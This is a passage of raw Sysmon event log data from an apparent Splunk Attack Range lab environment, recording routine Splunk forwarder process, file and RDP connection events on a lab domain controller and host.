09:28:34.103{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8EC2-6151-DF00-00000000FD01}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057945Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.103{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8EC2-6151-DF00-00000000FD01}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057944Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.105{5EBD8912-8EC2-6151-DF00-00000000FD01}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057965Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:35.713{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8931E50ACD92A8492556A10D4939A0ED,SHA256=C08D31BFF1DE4CA2514F559F80AA10D0901DC6928FEEFC212CA93B1904E85EDC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982284Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:33.187{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse110.10.193.201-54182-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000982283Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:32.902{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60031-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982282Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:35.851{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DCB68945D52871BEE498882FA0CEB2E,SHA256=8DC93729229D608B93D42CF78DB7E577F6D0CA612F13EA1DC042D6C66BDAEEF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057964Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:35.619{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66C8040D1616DFDAA9AE2C3301239C44,SHA256=FB8820571E41A0A1B8E2A49879BE694C70771F65398DB5946F502EDF691338A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982285Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:36.851{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF59EF81E0431657C770DFC0CCAA6FD0,SHA256=018CBB1905A01652ACA1B00029A87BEED8085B429581998CD1351BB3DF63BFDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057974Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:36.947{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=057A3C9489B16B60D62795836CF4E29B,SHA256=02E05767614606A25366972C97544F53F45F6B1BC4F34A14670586953F1D7014,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057973Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:36.619{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8EC4-6151-E100-00000000FD01}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057972Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:36.619{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057971Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:36.619{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057970Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:36.619{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057969Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:36.619{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057968Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:36.619{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8EC4-6151-E100-00000000FD01}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057967Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:36.619{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8EC4-6151-E100-00000000FD01}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057966Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:36.620{5EBD8912-8EC4-6151-E100-00000000FD01}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000982300Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.991{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0FFE7869884D85E5A64B8E3479FFC842,SHA256=C89AB088EC2B226389655BAAADB99C286EB577DAF48A353C0410E90923AA6C36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982299Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.866{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49ABCCC189FAB35A78B94ACFF448637A,SHA256=5537BB82C42B743E09423BDC6AF1CA4A3F6FBF1F76B2E0F6BB848139C82914A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000982298Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.460{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8EC5-6151-3D7A-00000000FD01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982297Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982296Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982295Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982294Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982293Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982292Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982291Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982290Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982289Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982288Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.460{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8EC5-6151-3D7A-00000000FD01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000982287Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.460{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8EC5-6151-3D7A-00000000FD01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 